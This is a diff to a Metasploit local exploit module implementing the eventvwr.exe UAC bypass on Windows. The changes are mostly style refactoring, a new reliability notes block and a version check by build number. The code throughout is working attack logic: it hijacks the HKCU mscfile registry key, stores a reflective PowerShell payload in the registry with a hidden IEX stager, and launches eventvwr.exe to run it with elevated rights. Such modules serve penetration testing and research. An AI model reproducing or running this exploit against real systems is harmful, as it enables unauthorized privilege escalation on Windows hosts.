@@ -11,13 +11,13 @@ class MetasploitModule < Msf::Exploit::Local
   include Post::Windows::Registry
   include Post::Windows::Runas
 
-  EVENTVWR_DEL_KEY = "HKCU\\Software\\Classes\\mscfile"
-  EVENTVWR_WRITE_KEY = "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"
-  EXEC_REG_VAL = '' # This maps to "(Default)"
-  EXEC_REG_VAL_TYPE = 'REG_SZ'
-  EVENTVWR_PATH = "%WINDIR%\\System32\\eventvwr.exe"
-  EVENTVWR_WOW64_PATH = "%WINDIR%\\SysWOW64\\eventvwr.exe"
-  PSH_PATH = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+  EVENTVWR_DEL_KEY = 'HKCU\\Software\\Classes\\mscfile'.freeze
+  EVENTVWR_WRITE_KEY = 'HKCU\\Software\\Classes\\mscfile\\shell\\open\\command'.freeze
+  EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
+  EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
+  EVENTVWR_PATH = '%WINDIR%\\System32\\eventvwr.exe'.freeze
+  EVENTVWR_WOW64_PATH = '%WINDIR%\\SysWOW64\\eventvwr.exe'.freeze
+  PSH_PATH = '%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe'.freeze
   CMD_MAX_LEN = 2081
 
   def initialize(info = {})
@@ -62,13 +62,19 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_railgun_api
             ]
           }
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         }
       )
     )
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_1607)
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
@@ -85,17 +91,15 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NoTarget, 'Session and Target arch must match')
     end
     if sysinfo['Architecture'] == ARCH_X64
-      vprint_status("Target is x64")
+      vprint_status('Target is x64')
       if session.arch == ARCH_X86
-        vprint_status("Detected Target/Session mismatch.  Syswow Required.")
+        vprint_status('Detected Target/Session mismatch.  Syswow Required.')
         registry_view = REGISTRY_VIEW_64_BIT
         eventvwr_cmd = EVENTVWR_WOW64_PATH
       end
-    else
+    elsif target_arch.first == ARCH_X64
       # if we're on x86, we can't handle x64 payloads
-      if target_arch.first == ARCH_X64
-        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
-      end
+      fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
     end
 
     # Validate that we can actually do things before we bother
@@ -118,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     payload_value = rand_text_alpha(8)
-    psh_path = expand_path("#{PSH_PATH}")
+    psh_path = expand_path(PSH_PATH.to_s)
     template_path = Rex::Powershell::Templates::TEMPLATE_DIR
     vprint_status("template_path #{template_path}")
     psh_payload = Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload.encoded)
@@ -126,30 +130,30 @@ class MetasploitModule < Msf::Exploit::Local
     psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
     cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
 
-    existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
+    existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || ''
 
     if existing.empty?
       registry_createkey(EVENTVWR_WRITE_KEY, registry_view)
     end
 
-    print_status("Configuring payload and stager registry keys ...")
+    print_status('Configuring payload and stager registry keys ...')
     registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
     registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
 
-    cmd_path = expand_path("#{eventvwr_cmd}")
+    cmd_path = expand_path(eventvwr_cmd.to_s)
     print_status("Executing payload: #{cmd_path}")
     result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE')
 
-    if result['return'] > 32 then
-      print_good("eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.")
-      Rex::sleep(10)
+    if result['return'] > 32
+      print_good('eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.')
+      Rex.sleep(10)
     else
       print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
     end
 
     handler(client)
 
-    print_status("Cleaning up registry keys ...")
+    print_status('Cleaning up registry keys ...')
     if existing.empty?
       registry_deletekey(EVENTVWR_DEL_KEY, registry_view)
     else
@@ -166,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Local
     admin_group = is_in_admin_group?
 
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
 
     unless is_in_admin_group?
@@ -177,12 +181,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
